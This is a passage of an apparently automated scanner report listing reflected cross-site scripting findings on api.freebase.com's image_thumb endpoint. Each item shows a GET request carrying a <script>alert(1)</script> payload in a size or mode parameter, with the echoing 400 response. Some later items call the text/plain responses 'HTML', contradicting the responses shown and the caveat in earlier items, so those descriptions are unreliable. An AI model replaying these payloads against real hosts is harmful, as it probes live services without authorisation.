User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:35 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, nivcsw=1, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:36 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:35Z;0044
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropdb893<script>alert(1)</script>797f7dc6251"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropdb893<script>
...[SNIP]...

2.52. http://api.freebase.com/api/trans/image_thumb/en/google [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the maxheight request parameter is echoed unencoded inside a JSON string in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload 4d0a8<script>alert(1)</script>d2a62a0b628 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32&maxheight=324d0a8<script>alert(1)</script>d2a62a0b628&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:55 GMT
Server: Apache
X-Metaweb-Cost: cc=0.014, dt=0.015, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.014
Expires: Thu, 12 May 2011 13:30:56 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:30:55Z;0058
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "324d0a8<script>alert(1)</script>d2a62a0b628"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:30:55Z;0058"
}

2.53. http://api.freebase.com/api/trans/image_thumb/en/google [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the maxwidth request parameter is echoed unencoded inside a JSON string in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload e5519<script>alert(1)</script>3d346272cd9 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32e5519<script>alert(1)</script>3d346272cd9&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:45 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:30:46 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:30:45Z;0002
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "32e5519<script>alert(1)</script>3d346272cd9"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache02.p01.sjc1:8101;2011-05-12T13:30:45Z;0002"
}

2.54. http://api.freebase.com/api/trans/image_thumb/en/google [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google

Issue detail

The value of the mode request parameter is echoed unencoded inside JSON strings (the info.value field and the validation message) in the application's 400 Bad Request error body, which is served with Content-Type: text/plain; charset=utf-8 rather than as an HTML document. The payload 47e6c<script>alert(1)</script>6642222ca67 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

The reflection is unencoded, but because the response declares itself text/plain (and sets no X-Content-Type-Options: nosniff header) a browser that honours the declared type displays the payload as text; it executes only if this body is embedded in an HTML page elsewhere or the browser sniffs it as HTML, so the High/Certain rating above overstates what this response alone shows.

Request

GET /api/trans/image_thumb/en/google?maxwidth=32&maxheight=32&mode=fillcrop47e6c<script>alert(1)</script>6642222ca67 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:09 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:10 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache01.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache01.p01.sjc1:8101;2011-05-12T13:31:09Z;0058
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop47e6c<script>alert(1)</script>6642222ca67"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop47e6c<script>
...[SNIP]...

2.55. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 4e8bf<script>alert(1)</script>42751bc8816 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=32&maxheight=324e8bf<script>alert(1)</script>42751bc8816&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:55 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:56 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:55Z;0041
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "324e8bf<script>alert(1)</script>42751bc8816"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:55Z;0041"
}

2.56. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 7e969<script>alert(1)</script>d8001a0cd8d was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=327e969<script>alert(1)</script>d8001a0cd8d&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:45 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:30:46 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:45Z;0002
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "327e969<script>alert(1)</script>d8001a0cd8d"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:45Z;0002"
}

2.57. http://api.freebase.com/api/trans/image_thumb/en/google_chrome [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_chrome

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload ba731<script>alert(1)</script>fdadf40e93f was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_chrome?maxwidth=32&maxheight=32&mode=fillcropba731<script>alert(1)</script>fdadf40e93f HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:09 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, stime=0.001, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:10 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:09Z;0035
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropba731<script>alert(1)</script>fdadf40e93f"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropba731<script>
...[SNIP]...

2.58. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 380fc<script>alert(1)</script>5b8117cdbae was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=32&maxheight=32380fc<script>alert(1)</script>5b8117cdbae&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:11 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:12 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:11Z;0028
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "32380fc<script>alert(1)</script>5b8117cdbae"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:11Z;0028"
}

2.59. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 3c299<script>alert(1)</script>31911d8bd05 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=323c299<script>alert(1)</script>31911d8bd05&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:56 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:57 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:30:56Z;0065
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "323c299<script>alert(1)</script>31911d8bd05"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:30:56Z;0065"
}

2.60. http://api.freebase.com/api/trans/image_thumb/en/google_i_o [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/google_i_o

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload 7a37d<script>alert(1)</script>0b43494b15d was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/google_i_o?maxwidth=32&maxheight=32&mode=fillcrop7a37d<script>alert(1)</script>0b43494b15d HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:26 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:25Z;0036
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcrop7a37d<script>alert(1)</script>0b43494b15d"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcrop7a37d<script>
...[SNIP]...

2.61. http://api.freebase.com/api/trans/image_thumb/en/skype [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload bc7ce<script>alert(1)</script>03297e6eafc was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=32&maxheight=32bc7ce<script>alert(1)</script>03297e6eafc&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:19 GMT
Server: Apache
X-Metaweb-Cost: cc=0.017, dt=0.018, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.017
Expires: Thu, 12 May 2011 13:31:20 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache04.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache04.p01.sjc1:8101;2011-05-12T13:31:19Z;0057
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "32bc7ce<script>alert(1)</script>03297e6eafc"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache04.p01.sjc1:8101;2011-05-12T13:31:19Z;0057"
}

2.62. http://api.freebase.com/api/trans/image_thumb/en/skype [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 47977<script>alert(1)</script>52d97883a5d was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=3247977<script>alert(1)</script>52d97883a5d&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:01 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, oublock=8, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:02 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:31:01Z;0051
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3247977<script>alert(1)</script>52d97883a5d"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:31:01Z;0051"
}

2.63. http://api.freebase.com/api/trans/image_thumb/en/skype [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/skype

Issue detail

The value of the mode request parameter is copied into the HTML document as plain text between tags. The payload d16ee<script>alert(1)</script>9f14939b273 was submitted in the mode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/skype?maxwidth=32&maxheight=32&mode=fillcropd16ee<script>alert(1)</script>9f14939b273 HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:35 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.012, mcs=0.0, mcu=0.0, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:31:36 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache02.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache02.p01.sjc1:8101;2011-05-12T13:31:35Z;0020
Content-Length: 475

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "mode",
"value": "fillcropd16ee<script>alert(1)</script>9f14939b273"
},
"message": "Value must be one of: fit; fill; fillcrop; fillcropmid (not u'fillcropd16ee<script>
...[SNIP]...

2.64. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the maxheight request parameter is copied into the HTML document as plain text between tags. The payload 1bc9a<script>alert(1)</script>03308122bf6 was submitted in the maxheight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=32&maxheight=321bc9a<script>alert(1)</script>03308122bf6&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:31:12 GMT
Server: Apache
X-Metaweb-Cost: cc=0.011, dt=0.011, mcs=0.0, mcu=0.0, tm=0.0, utime=0.011
Expires: Thu, 12 May 2011 13:31:13 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache01.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache01.p01.sjc1:8101;2011-05-12T13:31:12Z;0086
Content-Length: 390

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxheight",
"value": "321bc9a<script>alert(1)</script>03308122bf6"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache01.p01.sjc1:8101;2011-05-12T13:31:12Z;0086"
}

2.65. http://api.freebase.com/api/trans/image_thumb/en/youtube [maxwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

The value of the maxwidth request parameter is copied into the HTML document as plain text between tags. The payload 98742<script>alert(1)</script>4e597d81c40 was submitted in the maxwidth parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/trans/image_thumb/en/youtube?maxwidth=3298742<script>alert(1)</script>4e597d81c40&maxheight=32&mode=fillcrop HTTP/1.1
Host: api.freebase.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Date: Thu, 12 May 2011 13:30:58 GMT
Server: Apache
X-Metaweb-Cost: cc=0.012, dt=0.013, maxrss=8, mcs=0.0, mcu=0.0, minflt=2, tm=0.0, utime=0.012
Expires: Thu, 12 May 2011 13:30:59 GMT
Cache-Control: public, max-age=1, s-maxage=1, stale-while-revalidate=1, stale-if-error=1
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
X-Cache: MISS from cache03.p01.sjc1.metaweb.com
Connection: keep-alive
X-Metaweb-TID: cache;cache03.p01.sjc1:8101;2011-05-12T13:30:58Z;0023
Content-Length: 389

{
"code": "/api/status/error",
"messages": [
{
"code": "/api/status/error/input/invalid",
"info": {
"field": "maxwidth",
"value": "3298742<script>alert(1)</script>4e597d81c40"
},
"message": "Please enter an integer value"
}
],
"status": "400 Bad Request",
"transaction_id": "cache;cache03.p01.sjc1:8101;2011-05-12T13:30:58Z;0023"
}

2.66. http://api.freebase.com/api/trans/image_thumb/en/youtube [mode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.freebase.com
Path:   /api/trans/image_thumb/en/youtube

Issue detail

